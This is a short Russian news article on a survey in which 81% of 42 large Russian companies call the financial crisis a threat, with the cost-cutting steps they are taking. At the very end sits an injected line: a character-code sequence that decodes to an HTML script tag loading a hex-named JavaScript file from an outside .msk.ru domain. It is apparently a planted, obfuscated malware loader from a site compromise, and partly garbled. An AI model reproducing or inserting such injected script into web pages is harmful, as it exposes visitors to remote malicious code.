Для 81% компаний России финансовый кризис может оказаться губительным

На прошлой неделе представители компании Cornerstone осуществили исследование в сфере бизнеса, опросив руководителей 42 предприятий России, предоставляемые услуги и товары которых приносят, в среднем,  500 миллионов долларов в год. В ходе исследования выяснилось, что 81% российских компаний воспринимают мировой финансовый кризис как реальную угрозу для деятельности своих предприятий. В одинаковой мере - 9,5% респондентов – считают, что на их бизнесе кризис отразится лишь частично или, что ситуация никак не повлияет на ведение компаниями дел. Тем не менее, в настоящее время 90% из опрошенных респондентов уже используют или еще только вынашивают планы по уменьшению издержек. При этом, по словам специалистов, самым распространенным методом (76,2% случаев) в условиях кризиса явилось ужесточение  контроля за состоянием бюджета. Второе и третье место заняли, соответственно,  оптимизация численности сотрудников (52,3%) и замораживание различных проектов (38%). Еще 23,8% опрошенных рассказали о своих планах по отказу от неспециализированных активов в течение кризиса. Кроме того, одним из методов стало также сокращение бонусов для персонала. Этот метод применяется, в частности, промышленными предприятиями, компаниями в области недвижимости и  инвестиционными банками. Что касается медиа- и нефтегазовых компаний, то их бизнес услуги пока не нуждаются в ужесточении условий. Правда, как отметила Жанна Добрицкая, партнер отдела консультирования по управлению персоналом компании "Эрнст энд Янг" в СНГ, вскоре может понадобиться проведение сокращения размеров выплачиваемых зарплат.

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)48643b19f2c98c926ebf798a72f31317.js" type="text/javascript">